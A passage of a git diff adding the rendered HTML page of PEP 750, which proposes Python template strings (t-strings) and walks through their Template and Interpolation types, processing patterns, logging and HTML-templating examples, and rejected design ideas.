+template = t"<img {attributes} />"
+assert html(template) == '<img src="shrubbery.jpg" alt="looks nice" />'
+
+
+

Neither of these examples is possible with f-strings. By providing a +mechanism to intercept and transform interpolated values, template strings +enable a wide range of string processing use cases.

+
+
+

Specification

+
+

Template String Literals

+

This PEP introduces a new string prefix, t, to define template string literals. +These literals resolve to a new type, Template, found in a new top-level +standard library module, templatelib.

+

The following code creates a Template instance:

+
from templatelib import Template
+template = t"This is a template string."
+assert isinstance(template, Template)
+
+
+

Template string literals support the full syntax of PEP 701. This includes +the ability to nest template strings within interpolations, as well as the ability +to use all valid quote marks (', ", ''', and """). Like other string +prefixes, the t prefix must immediately precede the quote. Like f-strings, +both lowercase t and uppercase T prefixes are supported. Like +f-strings, t-strings may not be combined with the b or u prefixes. +Additionally, f-strings and t-strings cannot be combined, so the ft +prefix is invalid as well. t-strings may be combined with the r prefix; +see the Raw Template Strings section below for more information.

+
+
+

The Template Type

+

Template strings evaluate to an instance of a new type, templatelib.Template:

+
class Template:
+    args: Sequence[str | Interpolation]
+
+    def __init__(self, *args: str | Interpolation):
+        ...
+
+
+

The args attribute provides access to the string parts and +any interpolations in the literal:

+
name = "World"
+template = t"Hello {name}"
+assert isinstance(template.args[0], str)
+assert isinstance(template.args[1], Interpolation)
+assert template.args[0] == "Hello "
+assert template.args[1].value == "World"
+
+
+

See Interleaving of Template.args below for more information on how the +args attribute is structured.

+

The Template type is immutable. Template.args cannot be reassigned +or mutated.

+
+
+

The Interpolation Type

+

The Interpolation type represents an expression inside a template string. +Like Template, it is a new concrete type found in the templatelib module:

+
class Interpolation:
+    value: object
+    expr: str
+    conv: Literal["a", "r", "s"] | None
+    format_spec: str
+
+    __match_args__ = ("value", "expr", "conv", "format_spec")
+
+    def __init__(
+        self,
+        value: object,
+        expr: str,
+        conv: Literal["a", "r", "s"] | None = None,
+        format_spec: str = "",
+    ):
+        ...
+
+
+

Like Template, Interpolation is shallow immutable. Its attributes +cannot be reassigned.

+

The value attribute is the evaluated result of the interpolation:

+
name = "World"
+template = t"Hello {name}"
+assert template.args[1].value == "World"
+
+
+

The expr attribute is the original text of the interpolation:

+
name = "World"
+template = t"Hello {name}"
+assert template.args[1].expr == "name"
+
+
+

We expect that the expr attribute will not be used in most template processing +code. It is provided for completeness and for use in debugging and introspection. +See both the Common Patterns Seen in Processing Templates section and the +Examples section for more information on how to process template strings.

+

The conv attribute is the optional conversion +to be used, one of r, s, and a, corresponding to repr(), +str(), and ascii() conversions. As with f-strings, no other conversions +are supported:

+
name = "World"
+template = t"Hello {name!r}"
+assert template.args[1].conv == "r"
+
+
+

If no conversion is provided, conv is None.

+

The format_spec attribute is the format specification. +As with f-strings, this is an arbitrary string that defines how to present the value:

+
value = 42
+template = t"Value: {value:.2f}"
+assert template.args[1].format_spec == ".2f"
+
+
+

Format specifications in f-strings can themselves contain interpolations. This +is permitted in template strings as well; format_spec is set to the eagerly +evaluated result:

+
value = 42
+precision = 2
+template = t"Value: {value:.{precision}f}"
+assert template.args[1].format_spec == ".2f"
+
+
+

If no format specification is provided, format_spec defaults to an empty +string (""). This matches the format_spec parameter of Python’s +format() built-in.

+

Unlike f-strings, it is up to code that processes the template to determine how to interpret the conv and format_spec attributes. Such code is not required to use these attributes, but when they are present it should respect them and, to the extent possible, match the behavior of f-strings. It would be surprising if, for example, a template string that uses {value:.2f} did not round the value to two decimal places when processed.

+
+
+

Processing Template Strings

+

Developers can write arbitrary code to process template strings. For example, +the following function renders static parts of the template in lowercase and +interpolations in uppercase:

+
from templatelib import Template, Interpolation
+
+def lower_upper(template: Template) -> str:
+    """Render static parts lowercased and interpolations uppercased."""
+    parts: list[str] = []
+    for arg in template.args:
+        if isinstance(arg, Interpolation):
+            parts.append(str(arg.value).upper())
+        else:
+            parts.append(arg.lower())
+    return "".join(parts)
+
+name = "world"
+assert lower_upper(t"HELLO {name}") == "hello WORLD"
+
+
+

There is no requirement that template strings are processed in any particular +way. Code that processes templates has no obligation to return a string. +Template strings are a flexible, general-purpose feature.

+

See the Common Patterns Seen in Processing Templates section for more +information on how to process template strings. See the Examples section +for detailed working examples.

+
+
+

Template String Concatenation

+

Template strings support explicit concatenation using +. Concatenation is +supported for two Template instances as well as for a Template instance +and a str:

+
name = "World"
+template1 = t"Hello "
+template2 = t"{name}"
+assert template1 + template2 == t"Hello {name}"
+assert template1 + "!" == t"Hello !"
+assert "Hello " + template2 == t"Hello {name}"
+
+
+

Concatenation of templates is “viral”: the concatenation of a Template and +a str always results in a Template instance.

+

Python’s implicit concatenation syntax is also supported. The following code +will work as expected:

+
name = "World"
+template = t"Hello " "World"
+assert template == t"Hello World"
+template2 = t"Hello " t"World"
+assert template2 == t"Hello World"
+
+
+

The Template type implements the __add__() and __radd__() methods +roughly as follows:

+
class Template:
+    def __add__(self, other: object) -> Template:
+        if isinstance(other, str):
+            return Template(*self.args[:-1], self.args[-1] + other)
+        if not isinstance(other, Template):
+            return NotImplemented
+        return Template(*self.args[:-1], self.args[-1] + other.args[0], *other.args[1:])
+
+    def __radd__(self, other: object) -> Template:
+        if not isinstance(other, str):
+            return NotImplemented
+        return Template(other + self.args[0], *self.args[1:])
+
+
+

Special care is taken to ensure that the interleaving of str and Interpolation +instances is maintained when concatenating. (See the +Interleaving of Template.args section for more information.)

+
+
+

Template and Interpolation Equality

+

Two instances of Template are defined to be equal if their args attributes +contain the same strings and interpolations in the same order:

+
assert t"I love {stilton}" == t"I love {stilton}"
+assert t"I love {stilton}" != t"I love {roquefort}"
+assert t"I " + t"love {stilton}" == t"I love {stilton}"
+
+
+

The implementation of Template.__eq__() is roughly as follows:

+
class Template:
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, Template):
+            return NotImplemented
+        return self.args == other.args
+
+
+

Two instances of Interpolation are defined to be equal if their value, +expr, conv, and format_spec attributes are equal:

+
class Interpolation:
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, Interpolation):
+            return NotImplemented
+        return (
+            self.value == other.value
+            and self.expr == other.expr
+            and self.conv == other.conv
+            and self.format_spec == other.format_spec
+        )
+
+
+
+
+

No Support for Ordering

+

The Template and Interpolation types do not support ordering. This is +unlike all other string literal types in Python, which support lexicographic +ordering. Because interpolations can contain arbitrary values, there is no +natural ordering for them. As a result, neither the Template nor the +Interpolation type implements the standard comparison methods.
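A brief illustration (the exact error message is left to the implementation):

try:
    t"low" < t"high"
except TypeError:
    # Only equality is defined; ordering comparisons fall back to the
    # default object behavior and raise TypeError.
    pass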

+
+
+

Support for the debug specifier (=)

+

The debug specifier, =, is supported in template strings and behaves similarly +to how it behaves in f-strings, though due to limitations of the implementation +there is a slight difference.

+

In particular, t'{expr=}' is treated as t'expr={expr}':

+
name = "World"
+template = t"Hello {name=}"
+assert template.args[0] == "Hello name="
+assert template.args[1].value == "World"
+
+
+
+
+

Raw Template Strings

+

Raw template strings are supported using the rt (or tr) prefix:

+
trade = 'shrubberies'
+t = rt'Did you say "{trade}"?\n'
+assert t.args[0] == r'Did you say "'
+assert t.args[2] == r'"?\n'
+
+
+

In this example, the \n is treated as two separate characters +(a backslash followed by ‘n’) rather than a newline character. This is +consistent with Python’s raw string behavior.

+

As with regular template strings, interpolations in raw template strings are +processed normally, allowing for the combination of raw string behavior and +dynamic content.

+
+
+

Interpolation Expression Evaluation

+

Expression evaluation for interpolations is the same as in PEP 498:

+
+
The expressions that are extracted from the string are evaluated in the context +where the template string appeared. This means the expression has full access to its +lexical scope, including local and global variables. Any valid Python expression +can be used, including function and method calls.
+

Template strings are evaluated eagerly from left to right, just like f-strings. This means that +interpolations are evaluated immediately when the template string is processed, not deferred +or wrapped in lambdas.
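A small demonstration of the evaluation order (note() is an illustrative helper, not part of this PEP):

order: list[str] = []

def note(value: str) -> str:
    order.append(value)  # record the moment of evaluation
    return value

template = t"{note('first')} and {note('second')}"
# Both interpolations ran immediately, left to right, before any
# template-processing code was invoked:
assert order == ["first", "second"]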

+
+
+

Exceptions

+

Exceptions raised in t-string literals are the same as those raised in f-string +literals.

+
+
+

Interleaving of Template.args

+

In the Template type, the args attribute is a sequence that will always +alternate between string literals and Interpolation instances. Specifically:

+
    +
  • Even-indexed elements (0, 2, 4, …) are always of type str, representing +the literal parts of the template.
  • +
  • Odd-indexed elements (1, 3, 5, …) are always Interpolation instances, +representing the interpolated expressions.
  • +
+

For example, the following assertions hold:

+
name = "World"
+template = t"Hello {name}"
+assert len(template.args) == 3
+assert template.args[0] == "Hello "
+assert template.args[1].value == "World"
+assert template.args[2] == ""
+
+
+

These rules imply that the args attribute will always have an odd length. +As a consequence, empty strings are added to the sequence when the template +begins or ends with an interpolation, or when two interpolations are adjacent:

+
a, b = "a", "b"
+template = t"{a}{b}"
+assert len(template.args) == 5
+assert template.args[0] == ""
+assert template.args[1].value == "a"
+assert template.args[2] == ""
+assert template.args[3].value == "b"
+assert template.args[4] == ""
+
+
+

Most template processing code will not care about this detail and will use +either structural pattern matching or isinstance() checks to distinguish +between the two types of elements in the sequence.

+

The detail exists because it allows for performance optimizations in template +processing code. For example, a template processor could cache the static parts +of the template and only reprocess the dynamic parts when the template is +evaluated with different values. Access to the static parts can be done with +template.args[::2].

+

Interleaving is an invariant maintained by the Template class. Developers can take advantage of it, but they are not required to maintain it themselves. Specifically, Template.__init__() can be called with str and Interpolation instances in any order; the constructor will “interleave” them as necessary before assigning them to args.
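A small illustration of the constructor restoring the invariant (a hedged sketch against the reference implementation):

from templatelib import Template, Interpolation

interp = Interpolation("World", "name")
template = Template(interp)  # no string parts supplied at all
assert len(template.args) == 3
assert template.args[0] == "" and template.args[2] == ""  # inserted empties
assert template.args[1] is interp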

+
+
+
+

Examples

+

All examples in this section of the PEP have fully tested reference implementations +available in the public pep750-examples +git repository.

+
+

Example: Implementing f-strings with t-strings

+

It is easy to “implement” f-strings using t-strings. That is, we can +write a function f(template: Template) -> str that processes a Template +in much the same way as an f-string literal, returning the same result:

+
name = "World"
+value = 42
+templated = t"Hello {name!r}, value: {value:.2f}"
+formatted = f"Hello {name!r}, value: {value:.2f}"
+assert f(templated) == formatted
+
+
+

The f() function supports both conversion specifiers like !r and format +specifiers like :.2f. The full code is fairly simple:

+
from templatelib import Template, Interpolation
from typing import Literal
+
+def convert(value: object, conv: Literal["a", "r", "s"] | None) -> object:
+    if conv == "a":
+        return ascii(value)
+    elif conv == "r":
+        return repr(value)
+    elif conv == "s":
+        return str(value)
+    return value
+
+
+def f(template: Template) -> str:
+    parts = []
+    for arg in template.args:
+        match arg:
+            case str() as s:
+                parts.append(s)
+            case Interpolation(value, _, conv, format_spec):
+                value = convert(value, conv)
+                value = format(value, format_spec)
+                parts.append(value)
+    return "".join(parts)
+
+
+
+

Note

+

Example code

+

See fstring.py and test_fstring.py.

+
+
+
+

Example: Structured Logging

+

Structured logging allows developers to log data in both a human-readable format +and a structured format (like JSON) using only a single logging call. This is +useful for log aggregation systems that process the structured format while +still allowing developers to easily read their logs.

+

We present two different approaches to implementing structured logging with +template strings.

+
+

Approach 1: Custom Log Messages

+

The Python Logging Cookbook +has a short section on how to implement structured logging.

+

The logging cookbook suggests creating a new “message” class, StructuredMessage, +that is constructed with a simple text message and a separate dictionary of values:

+
message = StructuredMessage("user action", {
+    "action": "traded",
+    "amount": 42,
+    "item": "shrubs"
+})
+logging.info(message)
+
+# Outputs:
+# user action >>> {"action": "traded", "amount": 42, "item": "shrubs"}
+
+
+

The StructuredMessage.__str__() method formats both the human-readable +message and the values, combining them into a final string. (See the +logging cookbook +for its full example.)

+

We can implement an improved version of StructuredMessage using template strings:

+
import json
import logging
+from templatelib import Interpolation, Template
+from typing import Mapping
+
+class TemplateMessage:
+    def __init__(self, template: Template) -> None:
+        self.template = template
+
+    @property
+    def message(self) -> str:
+        # Use the f() function from the previous example
+        return f(self.template)
+
+    @property
+    def values(self) -> Mapping[str, object]:
+        return {
+            arg.expr: arg.value
+            for arg in self.template.args
+            if isinstance(arg, Interpolation)
+        }
+
+    def __str__(self) -> str:
+        return f"{self.message} >>> {json.dumps(self.values)}"
+
+_ = TemplateMessage  # optional, to improve readability
+action, amount, item = "traded", 42, "shrubs"
+logging.info(_(t"User {action}: {amount:.2f} {item}"))
+
+# Outputs:
+# User traded: 42.00 shrubs >>> {"action": "traded", "amount": 42, "item": "shrubs"}
+
+
+

Template strings give us a more elegant way to define the custom message +class. With template strings it is no longer necessary for developers to make +sure that their format string and values dictionary are kept in sync; a single +template string literal is all that is needed. The TemplateMessage +implementation can automatically extract structured keys and values from +the Interpolation.expr and Interpolation.value attributes, respectively.

+
+
+

Approach 2: Custom Formatters

+

Custom messages are a reasonable approach to structured logging but can be a +little awkward. To use them, developers must wrap every log message they write +in a custom class. This can be easy to forget.

+

An alternative approach is to define custom logging.Formatter classes. This +approach is more flexible and allows for more control over the final output. In +particular, it’s possible to take a single template string and output it in +multiple formats (human-readable and JSON) to separate log streams.

+

We define two simple formatters, a MessageFormatter for human-readable output +and a ValuesFormatter for JSON output:

+
import json
+from logging import Formatter, LogRecord
+from templatelib import Interpolation, Template
+from typing import Any, Mapping
+
+
+class MessageFormatter(Formatter):
+    def message(self, template: Template) -> str:
+        # Use the f() function from the previous example
+        return f(template)
+
+    def format(self, record: LogRecord) -> str:
+        msg = record.msg
+        if not isinstance(msg, Template):
+            return super().format(record)
+        return self.message(msg)
+
+
+class ValuesFormatter(Formatter):
+    def values(self, template: Template) -> Mapping[str, Any]:
+        return {
+            arg.expr: arg.value
+            for arg in template.args
+            if isinstance(arg, Interpolation)
+        }
+
+    def format(self, record: LogRecord) -> str:
+        msg = record.msg
+        if not isinstance(msg, Template):
+            return super().format(record)
+        return json.dumps(self.values(msg))
+
+
+

We can then use these formatters when configuring our logger:

+
import logging
+import sys
+
+logger = logging.getLogger(__name__)
+message_handler = logging.StreamHandler(sys.stdout)
+message_handler.setFormatter(MessageFormatter())
+logger.addHandler(message_handler)
+
+values_handler = logging.StreamHandler(sys.stderr)
+values_handler.setFormatter(ValuesFormatter())
+logger.addHandler(values_handler)
+
+action, amount, item = "traded", 42, "shrubs"
+logger.info(t"User {action}: {amount:.2f} {item}")
+
+# Outputs to sys.stdout:
+# User traded: 42.00 shrubs
+
+# At the same time, outputs to sys.stderr:
+# {"action": "traded", "amount": 42, "item": "shrubs"}
+
+
+

This approach has a couple of advantages over the custom message approach to structured logging:

+
    +
  • Developers can log a t-string directly without wrapping it in a custom class.
  • +
  • Human-readable and structured output can be sent to separate log streams. This +is useful for log aggregation systems that process structured data independently +from human-readable data.
  • +
+
+

Note

+

Example code

+

See logging.py and test_logging.py.

+
+
+
+
+

Example: HTML Templating

+

This PEP contains several short HTML templating examples. It turns out that the +“hypothetical” html() function mentioned in the Motivation section +(and a few other places in this PEP) exists and is available in the +pep750-examples repository. +If you’re thinking about parsing a complex grammar with template strings, we +hope you’ll find it useful.

+
+
+
+

Backwards Compatibility

+

Like f-strings, use of template strings will be a syntactic backwards incompatibility +with previous versions.

+
+
+

Security Implications

+

The security implications of working with template strings, with respect to +interpolations, are as follows:

+
    +
  1. Scope lookup is the same as f-strings (lexical scope). This model has been +shown to work well in practice.
  2. +
  3. Code that processes Template instances can ensure that any interpolations +are processed in a safe fashion, including respecting the context in which +they appear.
  4. +
+
+
+

How To Teach This

+

Template strings have several audiences:

+
    +
  • Developers using template strings and processing functions
  • +
  • Authors of template processing code
  • +
  • Framework authors who build interesting machinery with template strings
  • +
+

We hope that teaching developers will be straightforward. At a glance, +template strings look just like f-strings. Their syntax is familiar and the +scoping rules remain the same.

+

The first thing developers must learn is that template string literals don’t +evaluate to strings; instead, they evaluate to a new type, Template. This +is a simple type intended to be used by template processing code. It’s not until +developers call a processing function that they get the result they want: +typically, a string, although processing code can of course return any arbitrary +type.

+

Because developers will learn that t-strings are nearly always used in tandem +with processing functions, they don’t necessarily need to understand the details +of the Template type. As with descriptors and decorators, we expect many more +developers will use t-strings than write t-string processing functions.

+

Over time, a small number of more advanced developers will wish to author their +own template processing code. Writing processing code often requires thinking +in terms of formal grammars. Developers will need to learn how to parse the +args attribute of a Template instance and how to process interpolations +in a context-sensitive fashion. More sophisticated grammars will likely require +parsing to intermediate representations like an AST. Great template processing +code will handle format specifiers and conversions when appropriate. Writing +production-grade template processing code – for instance, to support HTML +templates – can be a large undertaking.

+

We expect that template strings will provide framework authors with a powerful +new tool in their toolbox. While the functionality of template strings overlaps +with existing tools like template engines, t-strings move that logic into +the language itself. Bringing the full power and generality of Python to bear on +string processing tasks opens new possibilities for framework authors.

+
+
+

Common Patterns Seen in Processing Templates

+
+

Structural Pattern Matching

+

Iterating over the Template.args with structural pattern matching is the expected +best practice for many template function implementations:

+
from templatelib import Template, Interpolation
from typing import Any
+
+def process(template: Template) -> Any:
+    for arg in template.args:
+        match arg:
+            case str() as s:
+                ... # handle each string part
+            case Interpolation() as interpolation:
+                ... # handle each interpolation
+
+
+

Processing code may also commonly sub-match on attributes of the Interpolation type:

+
match arg:
+    case Interpolation(int()):
+        ... # handle interpolations with integer values
+    case Interpolation(value=str() as s):
+        ... # handle interpolations with string values
+    # etc.
+
+
+
+
+

Memoizing

+

Template functions can efficiently process both static and dynamic parts of templates. +The structure of Template objects allows for effective memoization:

+
source = template.args[::2]  # Static string parts
+values = [i.value for i in template.args[1::2]]  # Dynamic interpolated values
+
+
+

This separation enables caching of processed static parts, while dynamic parts can be +inserted as needed. Authors of template processing code can use the static +source as cache keys, leading to significant performance improvements when +similar templates are used repeatedly.
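A hedged sketch of this caching strategy; parse_static() and render() are hypothetical helpers, not part of this PEP:

from templatelib import Template

_cache: dict[tuple[str, ...], object] = {}

def process(template: Template) -> str:
    key = tuple(template.args[::2])  # the static strings identify the "shape"
    parsed = _cache.get(key)
    if parsed is None:
        parsed = parse_static(key)   # hypothetical: expensive work, done once
        _cache[key] = parsed
    values = [i.value for i in template.args[1::2]]  # dynamic values
    return render(parsed, values)    # hypothetical: cheap per-call rendering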

+
+
+

Parsing to Intermediate Representations

+

Code that processes templates can parse the template string into intermediate +representations, like an AST. We expect that many template processing libraries +will use this approach.

+

For instance, rather than returning a str, our theoretical html() function +(see the Motivation section) could return an HTML Element defined in the +same package:

+
from collections.abc import Mapping, Sequence
from dataclasses import dataclass
from templatelib import Template

@dataclass(frozen=True)
+class Element:
+    tag: str
+    attributes: Mapping[str, str | bool]
+    children: Sequence[str | Element]
+
+    def __str__(self) -> str:
+        ...
+
+
+def html(template: Template) -> Element:
+    ...
+
+
+

Calling str(element) would then render the HTML but, in the meantime, the +Element could be manipulated in a variety of ways.

+
+
+

Context-sensitive Processing of Interpolations

+

Continuing with our hypothetical html() function, it could be made +context-sensitive. Interpolations could be processed differently depending +on where they appear in the template.

+

For example, our html() function could support multiple kinds of +interpolations:

+
attributes = {"id": "main"}
+attribute_value = "shrubbery"
+content = "hello"
+template = t"<div {attributes} data-value={attribute_value}>{content}</div>"
+element = html(template)
+assert str(element) == '<div id="main" data-value="shrubbery">hello</div>'
+
+
+

Because the {attributes} interpolation occurs in the context of an HTML tag, +and because there is no corresponding attribute name, it is treated as a dictionary +of attributes. The {attribute_value} interpolation is treated as a simple +string value and is quoted before inclusion in the final string. The +{content} interpolation is treated as potentially unsafe content and is +escaped before inclusion in the final string.

+
+
+

Nested Template Strings

+

Going a step further with our html() function, we could support nested +template strings. This would allow for more complex HTML structures to be +built up from simpler templates:

+
name = "World"
+content = html(t"<p>Hello {name}</p>")
+template = t"<div>{content}</div>"
+element = html(template)
+assert str(element) == '<div><p>Hello World</p></div>'
+
+
+

Because the {content} interpolation is an Element instance, it does +not need to be escaped before inclusion in the final string.

+

One could imagine a nice simplification: if the html() function is passed +a Template instance, it could automatically convert it to an Element +by recursively calling itself on the nested template.
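A hedged sketch of that recursive step; html(), Element, and escape_text() are the hypothetical examples used throughout this PEP:

from templatelib import Template

def render_child(child: object):
    if isinstance(child, Template):
        return html(child)          # recursively process nested templates
    if isinstance(child, Element):
        return child                # already-processed content needs no escaping
    return escape_text(str(child))  # plain values are escaped as before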

+

We expect that nesting and composition of templates will be a common pattern +in template processing code and, where appropriate, used in preference to +simple string concatenation.

+
+
+

Approaches to Lazy Evaluation

+

Like f-strings, interpolations in t-string literals are eagerly evaluated. However, +there are cases where lazy evaluation may be desirable.

+

If a single interpolation is expensive to evaluate, it can be explicitly wrapped +in a lambda in the template string literal:

+
name = "World"
+template = t"Hello {(lambda: name)}"
+assert callable(template.args[1].value)
+assert template.args[1].value() == "World"
+
+
+

This assumes, of course, that template processing code anticipates and handles +callable interpolation values. (One could imagine also supporting iterators, +awaitables, etc.) This is not a requirement of the PEP, but it is a common +pattern in template processing code.

+

In general, we hope that the community will develop best practices for lazy +evaluation of interpolations in template strings and that, when it makes sense, +common libraries will provide support for callable or awaitable values in +their template processing code.

+
+
+

Approaches to Asynchronous Evaluation

+

Closely related to lazy evaluation is asynchronous evaluation.

+

As with f-strings, the await keyword is allowed in interpolations:

+
import asyncio

async def example():
+    async def get_name() -> str:
+        await asyncio.sleep(1)
+        return "Sleepy"
+
+    template = t"Hello {await get_name()}"
+    # Use the f() function from the f-string example, above
+    assert f(template) == "Hello Sleepy"
+
+
+

More sophisticated template processing code can take advantage of this to +perform asynchronous operations in interpolations. For example, a “smart” +processing function could anticipate that an interpolation is an awaitable +and await it before processing the template string:

+
import asyncio

async def example():
+    async def get_name() -> str:
+        await asyncio.sleep(1)
+        return "Sleepy"
+
+    template = t"Hello {get_name}"
+    assert await aformat(template) == "Hello Sleepy"
+
+
+

This assumes that the template processing code in aformat() is asynchronous +and is able to await an interpolation’s value.
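A hedged sketch of what aformat() might look like (the repository's aformat.py is the authoritative version):

import inspect
from templatelib import Template, Interpolation

async def aformat(template: Template) -> str:
    parts: list[str] = []
    for arg in template.args:
        if isinstance(arg, Interpolation):
            value = arg.value
            if callable(value):
                value = value()      # e.g. a coroutine function like get_name
            if inspect.isawaitable(value):
                value = await value  # resolve the awaitable before formatting
            parts.append(str(value))
        else:
            parts.append(arg)
    return "".join(parts)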

+
+

Note

+

Example code

+

See aformat.py and test_aformat.py.

+
+
+
+

Approaches to Template Reuse

+

If developers wish to reuse template strings multiple times with different +values, they can write a function to return a Template instance:

+
def reusable(name: str, question: str) -> Template:
+    return t"Hello {name}, {question}?"
+
+template = reusable("friend", "how are you")
+template = reusable("King Arthur", "what is your quest")
+
+
+

This is, of course, no different from how f-strings can be reused.

+
+
+
+

Reference Implementation

+

At the time of this PEP’s announcement, a fully working implementation is available.

+

There is also a public repository of examples and tests +built around the reference implementation. If you’re interested in playing with +template strings, this repository is a great place to start.

+
+
+

Rejected Ideas

+

This PEP has been through several significant revisions. In addition, quite a few interesting +ideas were considered both in revisions of PEP 501 and in the Discourse discussion.

+

We attempt to document the most significant ideas that were considered and rejected.

+
+

Arbitrary String Literal Prefixes

+

Inspired by JavaScript tagged template literals, +an earlier version of this PEP allowed for arbitrary “tag” prefixes in front +of literal strings:

+
my_tag'Hello {name}'
+
+
+

The prefix was a special callable called a “tag function”. Tag functions +received the parts of the template string in an argument list. They could then +process the string and return an arbitrary value:

+
def my_tag(*args: str | Interpolation) -> Any:
+    ...
+
+
+

This approach was rejected for several reasons:

+
    +
  • It was deemed too complex to build in full generality. JavaScript allows for +arbitrary expressions to precede a template string, which is a significant +challenge to implement in Python.
  • +
  • It precluded future introduction of new string prefixes.
  • +
  • It seemed to needlessly pollute the namespace.
  • +
+

Use of a single t prefix was chosen as a simpler, more Pythonic approach and +more in keeping with template strings’ role as a generalization of f-strings.

+
+
+

Delayed Evaluation of Interpolations

+

An early version of this PEP proposed that interpolations should be lazily +evaluated. All interpolations were “wrapped” in implicit lambdas. Instead of +having an eagerly evaluated value attribute, interpolations had a +getvalue() method that would resolve the value of the interpolation:

+
class Interpolation:
+    ...
+    _value: Callable[[], object]
+
+    def getvalue(self) -> object:
+        return self._value()
+
+
+

This was rejected for several reasons:

+
    +
  • The overwhelming majority of use cases for template strings naturally call +for immediate evaluation.
  • +
  • Delayed evaluation would be a significant departure from the behavior of +f-strings.
  • +
  • Implicit lambda wrapping leads to difficulties with type hints and +static analysis.
  • +
+

Most importantly, there are viable (if imperfect) alternatives to implicit +lambda wrapping when lazy evaluation is desired. See the section on +Approaches to Lazy Evaluation, above, for more information.

+
+
+

Making Template and Interpolation Into Protocols

+

An early version of this PEP proposed that the Template and Interpolation +types be runtime checkable protocols rather than concrete types.

+

In the end, we felt that using concrete types was more straightforward.

+
+
+

An Additional Decoded Type

+

An early version of this PEP proposed an additional type, Decoded, to represent +the “static string” parts of a template string. This type derived from str and +had a single extra raw attribute that provided the original text of the string. +We rejected this in favor of the simpler approach of using plain str and +allowing combination of r and t prefixes.

+
+
+

Other Homes for Template and Interpolation

+

Previous versions of this PEP proposed that the Template and Interpolation +types be placed in the types module. This was rejected in favor of creating +a new top-level standard library module, templatelib. This was done to avoid +polluting the types module with seemingly unrelated types.

+
+
+

Enable Full Reconstruction of Original Template Literal

+

Earlier versions of this PEP attempted to make it possible to fully reconstruct +the text of the original template string from a Template instance. This was +rejected as being overly complex.

+

There are several limitations with respect to round-tripping to the original +source text:

+
    +
  • Interpolation.format_spec defaults to "" if not provided. It is therefore +impossible to distinguish t"{expr}" from t"{expr:}".
  • +
  • The debug specifier, =, is treated as a special case. It is therefore not +possible to distinguish t"{expr=}" from t"expr={expr}".
  • +
  • Finally, format specifiers in f-strings allow arbitrary nesting. In this PEP +and in the reference implementation, the specifier is eagerly evaluated +to set the format_spec in the Interpolation, thereby losing +the original expressions. For example:
  • +
+
value = 42
+precision = 2
+template = t"Value: {value:.{precision}f}"
+assert template.args[1].format_spec == ".2f"
+
+
+

We do not anticipate that these limitations will be a significant issue in practice. +Developers who need to obtain the original template string literal can always +use inspect.getsource() or similar tools.

+
+
+

Disallowing String Concatenation

+

Earlier versions of this PEP proposed that template strings should not support +concatenation. This was rejected in favor of allowing concatenation.

+

There are reasonable arguments in favor of rejecting one or all forms of +concatenation: namely, that it cuts off a class of potential bugs, particularly +when one takes the view that template strings will often contain complex grammars +for which concatenation doesn’t always have the same meaning (or any meaning).

+

Moreover, the earliest versions of this PEP proposed a syntax closer to +JavaScript’s tagged template literals, where an arbitrary callable could be used +as a prefix to a string literal. There was no guarantee that the callable would +return a type that supported concatenation.

+

In the end, we decided that the surprise to developers of a new string type +not supporting concatenation was likely to be greater than the theoretical +harm caused by supporting it. (Developers concatenate f-strings all the time, +after all, and while we are sure there are cases where this introduces bugs, +it’s not clear that those bugs outweigh the benefits of supporting concatenation.)

+

While concatenation is supported, we expect that code that uses template strings +will more commonly build up larger templates through nesting and composition +rather than concatenation.

+
+
+

Arbitrary Conversion Values

+

Python allows only r, s, or a as possible conversion type values. +Trying to assign a different value results in SyntaxError.

+

In theory, template functions could choose to handle other conversion types. But this +PEP adheres closely to PEP 701. Any changes to allowed values should be in a +separate PEP.

+
+
+

Removing conv From Interpolation

+

During the authoring of this PEP, we considered removing the conv attribute +from Interpolation and specifying that the conversion should be performed +eagerly, before Interpolation.value is set.

+

This was done to simplify the work of writing template processing code. The conv attribute is of limited extensibility (it is typed as Literal["r", "s", "a"] | None). It is not clear that it adds significant value or flexibility to template strings that couldn’t better be achieved with custom format specifiers. Unlike with format specifiers, there is no equivalent to Python’s format() built-in. (Instead, we include a sample implementation of convert() in the Examples section.)

+

Ultimately we decided to keep the conv attribute in the Interpolation type +to maintain compatibility with f-strings and to allow for future extensibility.

+
+
+

Alternate Interpolation Symbols

+

In the early stages of this PEP, we considered allowing alternate symbols for +interpolations in template strings. For example, we considered allowing +${name} as an alternative to {name} with the idea that it might be useful +for i18n or other purposes. See the +Discourse thread +for more information.

+

This was rejected in favor of keeping t-string syntax as close to f-string syntax +as possible.

+
+
+

A Lazy Conversion Specifier

+

We considered adding a new conversion specifier, !(), that would explicitly +wrap the interpolation expression in a lambda.

+

This was rejected in favor of the simpler approach of using explicit lambdas +when lazy evaluation is desired.

+
+
+

Alternate Layouts for Template.args

+

During the development of this PEP, we considered several alternate layouts for +the args attribute of the Template type. This included:

+
    +
  • Instead of args, Template contains a strings attribute of type +Sequence[str] and an interpolations attribute of type +Sequence[Interpolation]. There are zero or more interpolations and +there is always one more string than there are interpolations. Utility code +could build an interleaved sequence of strings and interpolations from these +separate attributes. This was rejected as being overly complex.
  • +
  • args is typed as a Sequence[tuple[str, Interpolation | None]]. Each static string is paired with its neighboring interpolation. The final string part has no corresponding interpolation. This was rejected as being overly complex.
  • +
  • args remains a Sequence[str | Interpolation] but does not support interleaving. As a result, empty strings are not added to the sequence. It is no longer possible to obtain static strings with args[::2]; instead, instance checks or structural pattern matching must be used to distinguish between strings and interpolations. We believe this approach is easier to explain and, at first glance, more intuitive. However, it was rejected as offering less future opportunity for performance optimization. We also believe that args[::2] may prove to be a useful shortcut in template processing code.
  • +
+
+
+

Mechanism to Describe the “Kind” of Template

+

If t-strings prove popular, it may be useful to have a way to describe the +“kind” of content found in a template string: “sql”, “html”, “css”, etc. +This could enable powerful new features in tools such as linters, formatters, +type checkers, and IDEs. (Imagine, for example, black formatting HTML in +t-strings, or mypy checking whether a given attribute is valid for an HTML +tag.) While exciting, this PEP does not propose any specific mechanism. It is +our hope that, over time, the community will develop conventions for this purpose.

+
+
+
+

Acknowledgements

+

Thanks to Ryan Morshead for contributions during development of the ideas leading +to template strings. Special mention also to Dropbox’s +pyxl for tackling similar ideas years ago. +Finally, thanks to Joachim Viide for his pioneering work on the tagged library. Tagged was not just the precursor to +template strings, but the place where the whole effort started via a GitHub issue +comment!

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0750.rst

+

Last modified: 2024-10-22 09:28:54 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0751/index.html b/pep-0751/index.html
new file mode 100644
